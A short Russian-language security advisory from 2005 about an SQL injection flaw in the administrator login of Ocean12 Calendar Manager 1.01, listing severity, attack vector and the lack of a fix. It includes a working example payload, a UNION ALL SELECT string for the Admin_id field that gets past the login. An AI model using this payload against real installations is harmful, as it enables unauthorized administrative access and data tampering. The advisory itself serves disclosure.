SQL-инъекция в Ocean12 Calendar Manager

Дата публикации:21.04.2005
Всего просмотров:821
Опасность:
Средняя
Наличие исправления: Нет
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации: Удаленная
Воздействие: Неавторизованное изменение данных
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: Ocean12 Calendar Manager Pro 1.x
Уязвимые версии: Ocean12 Calendar Manager 1.01

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения.

Интерфейс входа в систему администратора некорректно обрабатывает входные данные в полях формы 'Admin_id' и 'Admin_password'. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольные SQL команды на системе. Пример:

Admin_id: Admin' UNION ALL SELECT
id,id,id,id,id,id,id,id,id,id,id,id,id,id,id,id,id,
id,id,id,id,id,id,id ,id,id,id,id,id,id,i
d,id FROM settings WHERE Admin_id='Admin

Admin_password: 1

URL производителя: www.ocean12scripts.com/products/calendar/

Решение: Способов устранения уязвимости не существует в настоящее время.

Ссылки: Ocean12 Calendar manager 1.01 SQL injection